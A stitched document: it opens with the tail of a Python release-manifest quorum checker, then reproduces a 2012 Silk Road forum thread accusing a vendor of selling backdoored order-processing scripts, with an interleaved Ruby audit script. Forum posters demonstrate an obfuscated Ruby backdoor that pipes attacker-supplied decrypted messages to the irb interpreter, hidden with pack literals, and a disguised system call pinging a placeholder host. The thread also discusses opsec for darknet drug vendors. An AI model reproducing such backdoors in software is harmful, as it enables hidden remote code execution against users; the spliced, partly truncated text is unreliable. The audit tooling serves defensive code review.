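            agreeing.append(reviewer)
    return len(agreeing) >= quorum, agreeing, disagreeing


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Constructed release contents and reviewer names.
        (root / "orders.py").write_text("print('process orders')\n")
        (root / "README.txt").write_text("usage notes\n")
        reviewed = format_manifest(build_manifest(root))
        manifests = {"reviewer1": reviewed, "reviewer2": reviewed, "reviewer3": reviewed}
        print("as reviewed:", verify_quorum(root, manifests, quorum=3)[0])
        # Simulate a later download in which one file was swapped.
        (root / "orders.py").write_text("print('process orders')  # altered\n")
        ok, agree, disagree = verify_quorum(root, manifests, quorum=3)
        print("after swap:", ok, disagree["reviewer1"])
```

Agreement only shows that the copy in hand is the copy the reviewers hashed; the manifests themselves need to arrive through a channel the release author cannot rewrite, such as PGP-signed posts from each reviewer.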
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:45 am
There have been a lot of unfounded accusations thrown around these forums lately by quite a large number of people; many of these accusations are based on pure conjecture, and that is also the case here as there is no evidence to suggest or back up your claims that LouisCyphre is LE.
If you purchase the code and it does have malicious intent, you can stand behind your claim with proof.
Whilst it is of course possible that the copy you receive may be different than everybody else's, it is terribly foolish to make claims based on pure conjecture, especially claims as serious as this.

- grahamgreene

Graham, we are not playing by the same rules as regular civil society. We are criminals and we cannot afford to be playing by 'Marquis of Queensberry' rules or we will hang.

It is literally not possible to prove anything concrete on a forum of anonymous participants, since all you have is information from them. That does not mean you cannot red flag suspect behavior when it occurs.

Like I said already, if I am wrong, there is no real downside apart from Louis feeling aggrieved. The other option is that perhaps tens, hundreds, who really knows what number if nobody raised any alarm bells and it was popularized, of vendors go to the wall.

I hope that I am completely wrong. I did not post this thread, as some have said/implied, in some kind of angry ranting mood. In fact I thought about this for several hours before posting it. I realized the only thing that really prevented me from posting and calling out Louis outright was that we knew each other through PGP Club. Since this is an illogical rationale, I wrote to DPR expressing my concern and he thought the best thing would be to air these in public.

I know something about computer hacking. I know more than I want to about law enforcement, that is where my certainty that this is a highly suspect, probable LE act comes from. If this is paranoia, it is most assuredly informed paranoia.

This is the equivalent of preventative medicine. Would you want doctors to wait until they are 100% certain it is a cancerous tumor, or do you wish them to cut it out, even if it later turns out to be entirely benign? Or maybe you want to give the strange unknown lump a fair shake. After all, you have not yet proven it is cancerous. This is a direct analogy, because if you are busted on SR, it will be like a disease removing years from your lifespan, they are likely to be heavily disproportionate since they cannot catch us all at once, and will attribute yourself as a 'prime mover', as part of a conspiracy. I mean that in the legal sense of the word. That is if somebody on SR commits a crime, then you are responsible for it. Sounds like something I'm making up I know, but I'm unfortunately not.

So, those are the stakes.

A "middle of the road" perspective, where everybody has a point but nobody is completely wrong is a dangerous one. It makes LE agents into hypothetical creatures, which they most certainly are not. A lack of visibility on this is a key problem on this hidden service, kmfkewm has frequently noted this, it is detrimental to drug consumers, but positively lethal to drug suppliers.

There are two options before you: Louis Cyphre is a LE agent or he is not. Ignore his words after the incident, and examine his actual actions. What do you get?

I have put the probability at 70:30, which I think is more than fair. You can arrive at your own personal conclusions. I do not require other people to agree with me to change that ratio up or down, that would be fundamentally irrational when for all we know half the respondents in the thread could also be LE sockpuppets.

So in short, you don't get to change the title of *my* thread because you don't agree with me. That doesn't make sense. You can however make your own thread on this topic and call it whatever you wish.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:46 am
A general point I neglected to mention which may explain some of this situation:

People must understand that DPR isn't necessarily going to be pointing out every possible pitfall and removing them as options. For example, DPR's approach when I brought up the issue of LouisCyphre's program as a security concern for vendors was not "Yes, let's ban him, LE for sure" or "You're probably paranoid, Pine, I mean you think you're a platypus (but this is true)", it was "Go to the forum and have at it, let the vendors themselves decide what is best". This may seem strange, and it did to me at first blush, but I think the general idea, partly at least, is stemming from market based philosophy, is that being overly protective of a market could eventually lead to its downfall if people weren't recognizing 'issues' for themselves, whether or not they got them right or wrong.

That is interesting since DPR already knew what I was doing before I made the listing.  He has not (yet) taken me up on my offer to provide a copy of the code for his own peace of mind.

You're right about the agorist philosophy behind his response too.  You were asking him to regulate the market, which is the antithesis of what an agorist market is.

Actually, after informing DPR of my suspicions, I asked for something quite different.

--

It's even simpler than that:  If you don't want to use it for whatever reason, don't buy it.  If you do, buy it, I'll help you set it up, explain exactly what it does and how, provide best recommendations for secure use and if it turns out I'm fucking with you then you can provide that proof to DPR and he can terminate my account.

That is priceless. So... you're implicitly saying that in the time frame it takes:

A: You to realize this, which you almost certainly won't since that kinda misses the point of a deanonymizing exploit, and
B: The time it takes the police to grab you by the time you realize they are inside the building.

That the vendor will somehow obtain Internet access and dial up SR with a complaint. Because when a criminal is involved in computer based crime, LE agents always give them access to a laptop so he can skype his lawyer or whatever. I mean you're actually right, I cannot believe I did not think of this before.
--

Quote
Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.

Except it is insanely more difficult to pwn someone with a malicious JPG than it is to own someone who runs the script they just privately got from you....none of your arguments hold water and honestly they are stretching very far to try to make what you are doing appear to be anything other than sketchy with a capital S.

QFT

--

And no. So long as the scripts themselves are not ridiculous mountains of tortured spaghetti code (in which case no-one should run it on general principle), there will be no room full of NSA spooks required to vet the code thoroughly. It will be relatively brief. Either it makes network connections, or it doesn't. Either it does unexpected IO, or it doesn't.

This is not true at all.

It is not as simple as a brief Ctrl-F to search for code that makes network connections or examine I/O, finding exploits can be difficult. Myself and kmfkewm have come up with at least two perfectly plausible methods that are difficult to detect, and it's not as if we've spent months and months working out all the angles to make it come good like a real exploit tiger team would be doing.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:47 am
I want to thank Pine for explaining how exploits are hidden in code in such a way as to not be found, like I was in kindergarten, and typing in my first commands in Basic on a Commodore PET. Incredibly presumptuous of you.  Nothing like running to the forum and screaming LE! LE! LE! for teh lulz, eh, Pine?  ..........sickgirl

You can't talk that way to Pine... She has worked too hard typing her finger raw for this community. A little respect, please.

Ok, first off, I was responding to the condescending way I was being addressed. I for one appreciate all that she has done vis a vis the PGP club, but in this thread she made a lot of baseless accusations, and when I have someone who presumes that I do not know jack about computing, or code, I will correct them. When I am being spoken down to, I will respond in kind. As for "I can't"...well, I did, just as she did. I have been on silk road for over a year, I am not some n00b girl who comes in and runs her mouth. Do a little thread searching. I am actually quite polite, and patient. I do not however, take kindly to fear mongering and baseless accusations. The title of this thread was completely uncalled for. Therefore, it boils down to this. Communicate to me as if I were your equal, and do not make assumptions, and I will treat you and anyone else with respect. Disrespect me, and most likely, I will still be polite, but I will call you out. As for my sharp tone when I did it? Yeah, that was a bit out of character for me, but I was on the border of WD. Now my package has arrived and I am good, but I will not apologise. After all, I did not resort to name calling, nor did I go off and make accusations or assumptions toward her. I have given pine plenty of positive karma, and I really groove at a lot of the posts/threads she has made, and this does not change that. Just because someone does good for the community does not mean that they are a goddess who cannot ever be spoken to in a manner that may be less than praise. Respect is a two way street sweetie

I thank you wizdom for supporting me, yet it is also the case that sickgirl has a point in saying that comments should be judged on a per post basis if possible. As a heuristic, we naturally expect similar things from people i.e. continuity, but there is always the danger of winding up being engaged in what is called arguments to authority, that is not to say Pine is an authority, it's just the name of the fallacy, but that if anybody is right much of the time it doesn't necessarily follow they happen to be right this particular time. This happens a lot with scientists in this era unfortunately.

I went back and investigated my reply to your post sickgirl, and I can see how it came across as condescending. I stand behind the actual content of what I was saying, because it makes as much sense as it did to me back when I posted it, but I can assure you it was not meant to imply you were ignorant. Quite honestly it can be hard to tell who knows what, so I can sometimes give the impression of a lecturing tone, but the thing is I have no way to know what level of technological expertise you're at. I am also certain many people in PGP Club know and can skip over many of the steps I give them, but if I didn't deliberately elucidate each and every step, my tutorials would become un-newb-friendly, and accessible only to those already computer literate. I mean, it can be irritating when being told first principles over again, but it's not as big a problem as losing somebody in a conversation by talking over their head, then you make people feel small too, which is especially undesirable. I mean either way you stand to seem arrogant, I don't always achieve the right balance.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:48 am
I was a staunch capitalist for many years Limetless - I was pro-regulation, pro-market manipulation, pro-government and essentially pro-fascist given the nature of the beasts that I supported. With capitalism comes regulation and government intrusion. Indeed capitalism by its very regulatory nature is what powers the governments of today, and with them, their restrictive laws.

I think you just lost pretty much everybody here. Is this a postmodernist interpretation of capitalism?
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: THUMBSuP. on September 09, 2012, 09:50 am

"Hi, I'm LouisCyphre, you all know me so you already know I'm ok, my software is totally legit because I could have hypothetically done one of the things I mentioned above (but didn't) but don't worry because if you get arrested because it contained an exploit you can always tell DPR to suspend my account, LOL free market FTW, eh?!"

LOOOOOOOL.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:52 am
We shall have to agree to disagree my friend. :)

Anyway to the original point, can anyone confirm that the person is 110% Bent or not because I've had messages from both sides asking me to step in now so conclusions would be nice.

Well you can never prove anybody is 100% anything on an anonymous forum. I have not been requesting that LouisCyphre be banned. I have been saying loud and clear I consider his actions very suspect and that they have the same modus operandi I'd expect from a LE agent, so he is probably exactly that. The title of the thread which so outrages him is not intended to be a half measure.

If you want a number, mine is 70:30, where there's a 7/10 chance Louis is a LE agent, and 3/10 chance Louis is a python programmer that didn't think about what would happen if he gave drug dealers code they almost certainly couldn't audit in practice. I consider this estimate fair. Some people here though are massively more laissez-faire about the odds, which I suspect is going to undergo a dramatic reversal when somebody here does actually publicly get busted with some exploit.

--

Frankly, what I see here is that Louis appears to be being held to a higher standard than other vendors here on Silk Road. As almost everyone who knows me on here is aware, I'm not a drug user. Let's put that aside for a moment, and assume that this is not the case -- let's assume for a moment, for the purpose of argument, that I have decided to purchase a quantity of heroin. Now, how do I know that the heroin I purchase from a vendor on here has not been cut with Drano or rat poison? I don't.

Similarly, you don't see weed vendors being asked to submit their wares for testing to prove that they were not sprayed with God only knows what insecticide or fungicide.

I don't see DPR mandating that all drug vendors must have their wares laboratory-tested prior to sale, to prove their purity, and to prove that they were not contaminated/adulterated with harmful chemicals.

That's exactly correct and completely appropriate about a higher standard. Louis is absolutely being held to a higher standard, yes. This is because he knows a lot about computer security. So, it is a much greater suspension of trust I must have when Louis does something that frankly strongly resembles somebody trying to pass on an exploit to a target. Were some other less well known SR member to start posting security programs on SR, I would not be quite so worried about it, although I would express the same concerns.

Louis cannot claim ignorance of security procedures. His reputation as a helpful SR member is also a greater responsibility than most.

If we take away the name LouisCyphre and replaced it with somebody else uploading non audited software for drug vendors to use, then this thread would be startlingly different in character, which is not good, because reputation shouldn't matter if you goof up.

As for DPR mandating various testing schemes, it would indeed be nice if we could do such testing in a uniform manner, but mandating this won't work because it'd produce points of central weakness. We have not reached a solution here yet, there is surely a lot of work to do.

I also haven't seen Pine (or anyone else) pillory the vendors of the various USB-stick-based anonymity solutions that are being hawked on Silk Road.

I just did so in this very thread! Check!

I have also talked about it before now, how it was dumb to obtain hardware/software from SR, but it was something like seven or nine months ago. It bears repeating of course. To be honest with you, in the back of my mind I consider such a thing so completely obvious it hardly crosses my mind it might not be an LE plot. I think I've also seen people trying to sell mobile phones here too. There are some things which seem so obviously mental you can't be sure helping those who would have acquired them will do any good before they launch themselves like lemmings into the next available LE ambush.

Besides, you never really get thanked for pointing out people's inadequate security procedures. They tend to take it as a personal affront. The carrot works better than the stick. Then there's emergencies like this situation where the potential danger trumps treading on somebody's toes.

Maybe that seems somewhat cynical, but the question is really not:

"How do I know this USB drive I got off an illegal drug network contains LE malware?"

It's more:

"Why wouldn't it have LE malware on it?"

In other words, on the black market, the burden of proof, due to the penalties for being wrong, switches places. You know this is true as well as I do, a brief thought experiment: just approach your local drug gang, and see how far "you can't prove I'm not a police" gets you. I mean, that's why you have to kill people to become a member of many gangs in the first place, it's a sure way to distinguish between possible police and the genuine article, and there's always a never ending stream of people who require killing, mostly because of their civilian logic that doesn't apply to the black market, we already talked about this in a separate thread recently. This is of course, extraordinarily unpleasant for all affected, which is why SR is such a drastic improvement on what went before. The position of the burden of proof is still on you to not act in 'sketchy' ways though, rather than other people. Black markets are worlds of empiricism.

Anybody with another idea lacks experience. This is what haunts many members of the open vendor database, knowing the implications of being wrong from past experience or from the street and then seeing people on SR committing the same errors, often refusing point blank to recognize them for what they are. It's like when you cringe when a learner driver conflates the brake for the accelerator.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 09:53 am
Quote
Does the trigger string need to be part of the code or does it just tell the existing code to activate?

It needs to be part of the code, I included it as a comment so that it has no effect on the script but still signals to the original script that it should pipe the plaintext to irb.


 I'm assuming you mean the former, but I just want to clarify (since I don't know Ruby and don't know what your code snippet actually does).

Quote
Well, if pack in Ruby is what I think it is, then to do the same in Python I'd have to import struct (and probably array too).  I've already said several times what modules are imported, so there goes that.

pack changes how data is displayed. For example I could unpack the string "see" into binary representation : "see".unpack("B*") == ["011100110110010101100101"]
and I could put that in an array and pack it back into a string ["011100110110010101100101"].pack("B*") == "see"

so when I say

puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`

it is equal to saying

puts `echo "#{decrypted_message}" | irb`

which means that the decrypted message should be piped to irb which is a command line style tool for running ruby scripts.

I could also have said this:

puts `echo "#{decrypted_message}" #{["7c20697262"].pack("H*")}`


Quote
Hell, there are only two files with integers in them (to read data in each row of the CSVs).  Well, alright, 5 files if you count the one with a number in the name and the two files that invoke it.  Obviously in the case of those three files the number is part of a string and not an integer.

These numbers are strings also, anything in " " is a string.

Quote
Plus if a vendor is using an air gap all the networking code in the world won't do shit.  Yes, I know buyers are lazy and probably don't, but the paranoia of dealing makes an air gap a greater possibility.

And if we wear bomb proof suits we can jump on hand grenades.
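
The encoding trick shown in the post above defeats a text search for the interpreter's name, but it does not survive a reviewer who decodes constant pack literals before reading the command. The following is an added example, not code from the thread or from any poster: a Ruby triage script that lists shell-execution sinks and rewrites constant pack interpolations to the text they produce. The function names, the sink list and the SAMPLE script are assumptions made for this illustration; the two backtick lines in SAMPLE are the ones quoted in the post.

```ruby
# Added example: static triage of a Ruby script for shell-execution sinks and
# for constant Array#pack literals that hide a command name. The audited
# source is only read as text; none of it is evaluated.

# Constructs that hand a string to a shell or to an interpreter.
SINKS = {
  "backtick command"  => /`[^`]*`/,
  "%x command"        => /%x[({\[<]/,
  "system/exec/spawn" => /\b(?:system|exec|spawn)\b/,
  "popen/Open3"       => /\b(?:IO\.popen|Open3\.\w+)/,
  "eval"              => /\b(?:eval|instance_eval|class_eval)\b/
}.freeze

# [ ...constants... ].pack("fmt"), with no nested brackets inside the array.
PACK_LITERAL = /\[([^\[\]]*)\]\.pack\(\s*(["'])([^"']*)\2\s*\)/
# The same literal wrapped in string interpolation: #{ [..].pack("..") }
INTERPOLATED_PACK = /#\{\s*#{PACK_LITERAL.source}\s*\}/
# Only byte, hex and bit directives are decoded; pointer directives are refused.
SAFE_FORMAT = /\A[aAbBcChHUwnNvV*\d\s]+\z/

# Turn the text between [ and ] into Ruby values. Returns nil as soon as an
# element is not a literal integer or quoted string (i.e. not a constant).
def parse_constants(list_src)
  list_src.split(",").map do |raw|
    item = raw.strip
    case item
    when /\A-?\d+\z/        then item.to_i
    when /\A0x\h+\z/i       then item.hex
    when /\A(["'])(.*)\1\z/ then Regexp.last_match(2)
    else return nil
    end
  end
end

# Decode one pack literal to the string it yields at run time, or nil when it
# is not constant or uses a directive outside SAFE_FORMAT.
def decode_pack(list_src, fmt)
  return nil unless fmt.match?(SAFE_FORMAT)
  values = parse_constants(list_src)
  return nil if values.nil?
  values.pack(fmt).force_encoding("UTF-8").scrub("?")
rescue ArgumentError, TypeError, RangeError
  nil
end

# Rewrite #{[..].pack("..")} interpolations to the text they produce, so the
# reviewer reads the command that would actually reach the shell.
def deobfuscate(line)
  line.gsub(INTERPOLATED_PACK) do
    m = Regexp.last_match
    decode_pack(m[1], m[3]) || m[0]
  end
end

# Returns [line_number, kind, detail] triples for every sink and every
# decodable pack literal found in the source text.
def audit(source)
  findings = []
  source.each_line.with_index(1) do |line, no|
    SINKS.each { |kind, re| findings << [no, kind, line.strip] if line.match?(re) }
    line.scan(PACK_LITERAL) do |list_src, _quote, fmt|
      decoded = decode_pack(list_src, fmt)
      findings << [no, "pack literal decodes to", decoded] if decoded
    end
  end
  findings
end

# Constructed sample; lines 4 and 5 are the two variants quoted in the post.
SAMPLE = <<~'RUBY'
  # constructed sample: order-processing script under review
  decrypted_message = File.read("order.txt")
  puts decrypted_message
  puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
  puts `echo "#{decrypted_message}" #{["7c20697262"].pack("H*")}`
RUBY

if __FILE__ == $PROGRAM_NAME
  audit(SAMPLE).each { |no, kind, detail| puts "line #{no}: #{kind}: #{detail}" }
  SAMPLE.each_line { |l| puts deobfuscate(l) if l.match?(INTERPOLATED_PACK) }
end
```

It only decodes arrays of literal integers and strings; a value computed at run time stays unresolved, and the line still appears as a shell sink that has to be read by hand.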
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 09, 2012, 09:53 am
Quote
Then the issue boils down to where is the encrypted data coming from?  If there is encrypted data in my code (there isn't) then what you describe is possible.  If the only encrypted data is coming from vendor's order page then it's really not.

Doesn't the encrypted data on the vendors page come from customers? The encrypted data is coming from a customer who encrypts ruby code instead of their address. In fact they can even encrypt ruby code that puts their address after it is done with all of its networking.

Ah, that answers one of my other questions.

I'd have to add a lot of code to achieve that with my current effort.  There is no way to conceal that something was occurring between the decryption and the parsing of the decrypted data to produce a printable file.  Especially not after stating that the bash command was just the GPG command (i.e. gpg --decrypt-files *.asc) and doing it in Python is this:

Code: [Select]
import os
os.system("gpg --decrypt-files *.asc")
Quote
To do that I would need to insert code which checked each decrypted address for a specific string and then generate the code.

No it doesn't need to generate the code. Currently what I showed does check for a specific string and if it finds it it pipes the decrypted message to a ruby interpreter, which then runs it as a completely different script automatically. There are probably even more sneaky ways to do it without looking for a special string.

See, in my code it's a little more modular.  There is a file that will run everything, but the instructions indicate the best way to handle it is to run things sequentially.  Once the first section is run up to the decryption command, that script stops.  Then the vendor checks all the .txt files to see if there's anything he or she needs to edit to fit the template for printing.

Like you, I realised that buyers could put anything they liked in there, but I was considering the probability of little thankyou notes to their favourite vendor(s) which may be nice, but don't help with printing labels or envelopes well.

We can not possibly know what it does without looking at it, that is the entire point of this thread. But honestly if you want to let the market decide I really don't give a shit. I think that you are thinking more with your wallet than logically though.

I'm certainly considering the financial aspect, but I haven't completely disregarded logic.  If I had then I wouldn't've been able to handle this thread so consistently.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:56 am
So, again, why is Louis being held to a higher standard than everyone else? Why is he being asked to prove the safety of his product, when every other vendor on Silk Road is not?

If somebody sends poison in the post it affects a few people before it gets caught. If vendors install software with an exploit, then they all get busted. That is why I say we're not playing by Marquess of Queensberry rules.
--
You, sir, are now engaging in the same type of vile and slanderous accusations as Pine.  Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile.  It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.

Get off your high horse.

This is not a courtroom. This is the black market. You did something incriminating. That is more than enough to justify labeling you as a potential LE agent.

--

Quote
As such, Louis has the right to market his wares under any conditions that he deems fit.

Nobody really argued that he should be banned from selling it, we are just warning people that it is dumb if they buy it unless the source code is publicly available for all to audit. The type of people who will buy something like this are inherently people who do not know how to properly audit it.

Not true.  Pine tried exactly that before starting this thread.  See this post from her details earlier in this thread:

http://dkn255hz262ypmii.onion/index.php?topic=40934.msg451841#msg451841

That doesn't say I tried to ban you at all. That was just your interpretation of why you think I went to DPR. And it is true, I didn't ask DPR to ban you, I had something quite different on my mind.

I asked to set up a dummy buyer so we could observe what happened in a remote controlled environment, with the intention of following an exploit's comms (if it was that kind of exploit) and tracing it back to the destination IP address, which is almost certainly going to be a DEA office.

After some consideration, I agree with DPR's assessment that calling you out in the open about this was more effective on several counts. Not only did it create a discussion interesting in terms of illustrating how exploits can work and spreading some security awareness on that count, but having your RL identity could have turned into more of a problem than a solution. It might achieve proving you are/aren't a LE agent (no IP), but the downside is that if you are a LE agent, then the temptation of coercion would leak in, not now, but if this war went hot suddenly, it'd be a temptation to retaliate directly, simply because it would be easy and satisfying. This of course defiles the moral objective of this enterprise. Even LE agents shouldn't have to fear this specter, enough people have suffered and bled for this war already. I would hope there exists an 'anti-pine' on the other side that takes the same view. More pragmatically, it would make this war ever more intractable and draw more resources against the darknet markets, the entire thing could spin completely out of control if we suddenly started with such an active approach.

Quote
Frankly, what I see here is that Louis appears to be being held to a higher standard than other vendors here on Silk Road.

If a vendor is selling MDMA tablets that are of a press known to frequently contain PMA then is it wrong for us to bring this up? No. He is being held to the same standard as any other vendor, reviews are being left on his product. If someone sells PMA we don't need to try it to leave a review saying that it is dangerous, do we?

Ah, but this isn't really a review of the product, it's your assertions about it with no evidence.  You already know how to get the evidence to prove one of us right, you're choosing not to.

Also, your MDMA/PMA analogy still depends on someone purchasing the product and testing it.

As repeatedly explained the problem is that there is no way to know what you "intended" to do vs what you choose to show us later on.

Quote
As almost everyone who knows me on here is aware, I'm not a drug user. Let's put that aside for a moment, and assume that this is not the case -- let's assume for a moment, for the purpose of argument, that I have decided to purchase a quantity of heroin. Now, how do I know that the heroin I purchase from a vendor on here has not been cut with Drano or rat poison? I don't.

It is wrong to say that his product IS backdoored. It is wrong to say a vendor's product has been cut with Drano if you have not purchased some and tested it. It is not wrong to say that PMA is dangerous if a vendor is selling PMA.

Yet you have previously stated that my code contains an exploit simply because you thought of a way it could be done.  You have not actually obtained the code and proven that it does contain such an exploit.

I have written the code and stated there is no such exploit.  You have yet to prove that I am lying.

Another major vendor is running the code and has stated that it does exactly what I said it did.  You and Pine have been unable to prove that false.

We don't have to prove anything. You don't get it. The burden of proof is on everybody on SR not to act in sketchy ways. If you are not LE, then I certainly know you're new to these markets. The burden of proof has always been on the person the question is being asked of. It is up to you to prove your innocence by not acting in incriminating ways rather than the other way around. On the white market, in civilian courts this is the other way around.

You seem to have the idea that this is supposed to be fair. This is an amazing idea, clearly you are new to criminality.

Once again, these aren't reviews of the product and your claim that they are is disingenuous at best.  Your assertions are a series of hypothetical explanations of how an exploit could be inserted, but not a review of the actual code I am selling.

There has been one review of the code in this thread, which you have chosen to ignore.

That review is here (on the first page):

http://dkn255hz262ypmii.onion/index.php?topic=40934.msg450715#msg450715

Louis, you could have 1000 reviews, but they could all be LE buyers collaborating with you to form an illusion of reliability. The only way we can see to prove the code that you are giving us, and the code other people are executing, is the same code, is if it comes from the same place i.e. a forum thread on here. Believe it or not, LE agents lie sometimes, even lying about themselves lying. Incredible, I know! Who would have thought them so unscrupulous!

If I am paranoid and 'accusatory' (probably because I'm actually accusing you, no?) then you've been seriously obtuse by pretending many things are more straight forward than they actually are.

Air gaps. -> They are not simple for most vendors to use.

You want to make extra money. -> But you intend to sell to what is probably literally SR's smallest market.

Computer programming. -> Not everybody is able to follow it, even when explained in detail. Probably because it takes months/years to learn it.

Open source. -> But only non-programmers will be reading the code. I'm sure there's a soviet russia joke in this somewhere.

You guys have to prove I tried to pull off an exploit. -> Except nobody independently generated a checksum since you didn't think to request it in the first place, we have no idea if you're giving the original code. It's not as if one or two people would be enough either, you'd need lots, having auditors signing your program would also work, but both principles are based on the fundamental principle of counting.

--

Well, on a theoretical level I think that everything you said makes sense guru, but on the other hand I feel that your comparison between asking a drug seller to prove their wares and asking a programmer to prove that their software is safe.

The difference is as follows:

1.  It's impossible for a drug seller to really prove that they'll always be shipping something safe.  It's a lot easier for a programmer to prove that their program is safe by releasing it open source etc.

Two problems here:

1)  A programmer could release code that is safe and sell something else.

Holy cow, I think we're getting to you at last!

2)  Releasing the code freely cuts out payment for the work put in, as I've explained previously.

If you're not LE, then that sucks, but there is nothing you can do about it, you just have to deal.

2.  If a drug dealer ships something unsafe then 1 person has a bad reaction.  If louis widely gives out malware specifically targeting vendors and information regarding their vending then that's a major blow to silk road itself.

That's a big if.  Pine and Kmf have each asserted it does and I've already stated that anyone can purchase the code and post it to the forum.  Until someone does then this is all conjecture and baseless assertions.

This appears to be a problematic concept.

- We are saying that your profile of targeting vendors, esp. large vendors given the price tag, with code they can't read, which was your initial proposition, is very LE-like.
- The above ^, is not evidence you are LE. There is no evidence you are LE as I've already said, it's not actually possible to obtain any. It just strongly implies that you are.

There is no practical difference between "I think he is probably LE" and "This guy is LE". In RL the reception is the same, and it doesn't change here. The title of the thread is about obtaining hits, because a wishywashy 'I think maybe perhaps, sorta, coulda be LE' doesn't quite have the same resonance. I am accusing you of something. This is not equivalent to making a scientifically provable statement. It is called an opinion. You can go create a thread called "Louis is not LE" or something. Same applies.

So sure, don't force louis to do anything, but at the same time I'm glad that people have spoken out against this because this WOULD be a great way to get at vendors (although I don't think that it is that).

For the record, I don't have any problem with questions about what the code does.

What I have a problem with is the baseless and false accusations of nefarious activity on my part with nothing to back it up.  You've seen that I've copped that from both Pine and Kmf.

Good grief, call us back when you climb down off the cross Cypher Jesus. You think I give a flying fuck about how affronted you are when there was a fantastic opportunity vendors using your software would have got busted if this had not been made public. Even if you don't think it's a case of 70:30 ratio of Louis being a LE agent, most people in this thread think the opportunity cost of being wrong is too high even if the ratio was 10:90.

For the record on my part, I think this has been a healthy albeit awkward discussion that has made the dangers of software exploits abundantly clear. If this was a LE project, it has failed miserably. If Louis feels offended, well, that's just too bad. If he's around after the drug war and it is shown I was wrong, then I'll be delighted to compensate him.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 09:57 am
Indeed, I know a vendor who spends half a day decrypting addresses.
Sroppy does it in milliseconds.
Vendor doesn't have to do crazy gangsigns on his laptop keyboard anymore cutting and pasting blocks of pgp gibberish

I wonder if the vendor has heard of the wildcard.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 09:59 am
Quote
By the end of next year Ruby will be 18 years old, nearly old enough to drink (in most places) and it still doesn't have that.  Wow.

Ruby does bytecode but in most implementations of it there is not an (easy, or intended) way to launch programs directly from bytecode. Also I think Ruby is 20 years old not 18.

As far as how many people here know C and can audit it, I assume quite a few actually. I have had no problems finding a whole lot of people to look over any of the code I have ever written. We are on a forum on the darknet where everyone uses crypto, there are probably hundreds to a thousand professional and hobbyist programmers on this forum.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 10:22 am
Quote
Every time a vendor has to make a reply to a customer, they have to burn data to 2 read only DVD/CDs. Once to find out what the message was, once to make the reply.

Actually at least in one direction they would need to hand type the information over. Using DVDs in both directions would break the air gap.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: THUMBSuP. on September 09, 2012, 10:35 am
having the Road on one machine then printing on another machine really doesn't seem too bad.
i mean.. as long as you have a basic grasp on the idea of reading and typing what you have read.


>.> air gap, smair gap.

someone on here is a fucking cop, boys! and we're gonna sherlock holmes this shit until the end!!!11111oneoneoneone



/thumbs
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 09, 2012, 10:53 am
Quote
inserting a function that checks decrypted addresses for such code to run AND is used in conjunction with an order containing that code AND is being run on a system with network access.

It doesn't need to check for code, it can check for anything. It can run messages that are 101 bytes as ruby code and puts all the others. And actually it doesn't even need that because you can directly issue commands to the terminal with Ruby at least and I would highly bet that you can with python.

Yep, I've demonstrated this a couple of times already.  It's a function, though, Python doesn't have anything like Ruby's put command (no, I haven't learned the language, I just looked at the Wikipedia page on it).

having `ping t.cc` in a script will ping t.cc, just need to encode it in some funky way to try to hide that it is happening. Now there is no need to load networking modules at all or to run any decrypted messages as code.

Okay, but calling the function necessary to invoke it is rather obvious.  Locating that is just a matter of grepping for os.system.

Now I could conceal that a little with something like:

Code:
import os
s = os.system

But then it would still be clear that s("ping supersecretlebase.example.com") is a system call.

Quote
* No encrypted data is shipped with my code.

But it gets encrypted data input from random customers

Yeah, when I wrote that I didn't get what your code was actually doing.

Quote
* There is a copy of my GPG key currently.  I think I will remove it in light of this and just include the details for obtaining it (it's here, on the vendor pages and on the key servers).

There is no reason for there to be a copy of your GPG key, in the example I gave the exploit is encrypted to the vendor's key and they load it into the program, they have no ability to tell encrypted ruby code apart from encrypted addresses because ciphertext looks random in either case.

I've removed the key from the current dev branch for two reasons: to remove the possibility of hiding something in there and in case a user runs everything from the extracted directory instead of copying the specified files to a temp directory.

Quote
* There is no such exploit in my code.

Possibly not. Probably not even!

Well, Pine has finally returned to the thread and she doesn't share your confidence in the probabilities.

But nobody really knows unless we can look at it. That is the entire point of this thread. We should not have a culture here where people's claims are taken at face value, especially when vendors are at risk. The purpose of my posting code was simply to show that even a tiny bit of code can make the difference between a secure program and a backdoored one. Honestly I was surprised at how well the backdoor was hidden, certainly better than in my first attempt where I simply unpacked all the calls to arrays of numbers. I have never tried hiding backdoors in code before, and if I tried harder I could probably even make it more subtle than the last example I gave.

Well, you're one ahead of me.  I don't have any experience planting backdoors in code.

Quote
* Such an exploit would be able to be spotted.

Indeed by anyone who knows the language well enough to

A. Know what back ticks do
B. Know what pack and unpack do
C. Know what | does on a terminal
D. Know what irb is
E. Knows the language, since they wouldn't just look at that part of the code but would need to audit the entire thing

